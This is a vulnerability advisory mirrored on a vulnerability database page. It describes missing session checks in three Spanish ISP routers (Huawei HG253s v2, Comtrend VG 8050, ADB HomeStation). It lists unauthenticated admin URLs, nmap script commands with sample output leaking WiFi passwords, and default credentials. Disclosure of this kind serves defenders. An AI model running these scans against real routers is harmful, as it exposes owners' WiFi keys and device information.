Vulners
Lucene search
Huawei HG253s V2 Information Disclosure
🗓️ 24 Nov 2015 00:00:00Reported by Vicen DominguezType 
packetstorm🔗 packetstormsecurity.com👁 78 Views
`Huawei HG253s v2
Vodafone-Spain is starting to rent a new Huawei HG253v2 router to the
spanish costumers. This new router is coming with a new firmware version.
This bug has been found by @VicenDominguez
Vulnerability
Basically, it is not validating the session cookie in some administration
webpages. So, It is possible to get direct information from those urls in
any router open to internet.
http://IPhtml_253s/api/ntwk/WlanBasic
http://IP/html_253s/api/system/diagnose_internet
http://IP/html_253s/api/system/hostinfo?type=ethhost
http://IP/html_253s/api/system/hostinfo?type=guesthost
http://IP/html_253s/api/system/hostinfo?type=homehost
http://IP/html_253s/api/system/hostinfo?type=wifihost
http://IP/html_253s/api/system/wizardcfg
Usage
nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-vodafone-hua253s:
| SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
| Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP:
192.168.0.XX
Comtrend VG 8050
Telefonica-Spain is starting to rent a new Comtrend VG 8050 router to the
spanish costumers. This new router is coming with a new firmware version.
This bug has been found by @DaniLabs
Vulnerability
Basically, it is not validating the session cookie in some administration
webpages. So, It is possible to get direct information from those urls in
any router open to internet.
http://IP/getWifiInfo.jx
http://IP/listDevices.jx
http://IP/infoApplications.jx
Usage
nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-comtrend-vg-8050:
| SSID: MOVISTAR_XXX
| Cipher Algorithm: WPA
| Password WEP:
| Password WPA: gTU3NkXE44RYjuM2RrxM
| Password WPA2:
| Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X
ADB P.DGA4001N (HomeStation)
Telefonica-Spain is starting to rent a new ADB P.DGA4001N router to the
spanish costumers. This new router is coming with a new firmware version.
This bug has been found by @DaniLabs
Vulnerability
Basically, it is not validating the session cookie in some administration
webpages. So, It is possible to get direct information from those urls in
any router open to internet.
http://IP/getWifiInfo.jx
http://IP/listDevices.jx
http://IP/infoApplications.jx
Add the credentials by default are admin / 1234
Usage
nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-homestation:
| SSID: WLAN_HOME
| Cipher Algorithm: WEP
| Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X
Here the scripts https://github.com/DaniLabs/scripts-nse
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Nov 2015 00:00Current
7.4High risk
Vulners AI Score7.4